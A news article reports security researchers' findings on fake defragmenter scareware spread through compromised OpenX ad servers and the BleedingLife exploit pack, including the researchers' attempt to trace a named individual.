14 DAY TRIAL // Scammers behind the new family of scareware programs that pose as hard disk drive defragmentation utilities are using vulnerable OpenX servers to launch drive-by downloads and infect users.
This new attack was spotted by security researchers from Web application security solutions vendor Armorize Technologies, who last week revealed that the same cyber criminals managed to get malicious ads onto Google's and Microsoft's advertising networks.
This piece of scareware goes by different names including "HDD Tools", "HDD Plus", “Ultra Defragger”, “Smart Defragmenter”, “HDD Defragmenter”, “System Defragmenter”, “Disk Defragmenter”, “Quick Defragmenter”, “Check Disk” or “Scan Disk.”
The attackers begin by exploiting known vulnerabilities in outdated OpenX ad servers to inject rogue code into the /www/delivery/ajs.php banner serving script.
The code generates an iframe on the public facing pages, which points to an externally hosted instance of the BleedingLife v2 exploit pack.
This toolkit serves exploits for two vulnerabilities in older Flash Player versions, two affecting Adobe Reader, and two Java. "The exploitation success rate is 28%, which is very high," says Armorize CTO Wayne Huang.
Antivirus detection rate for these reliably written exploits is very low on VirusTotal, while detection for the dropped scareware is around 63% at the time of writing this article.
By investigating the payment infrastructure used by the HDD Plus scareware, Armorize researchers managed to link it to one Dmitry Slevin from Moscow.
They even obtained his phone number and called him. He said that he only offers domain services to others and knows nothing of the scareware, but after the discussion, modifications meant to hide his tracks were made to websites involved in this scheme.
"We don't know what for parts of this 'HDD Plus' operations Slevin is responsible, but we're sure he's involved and chose to tell little of what he knows," Mr. Huang concludes.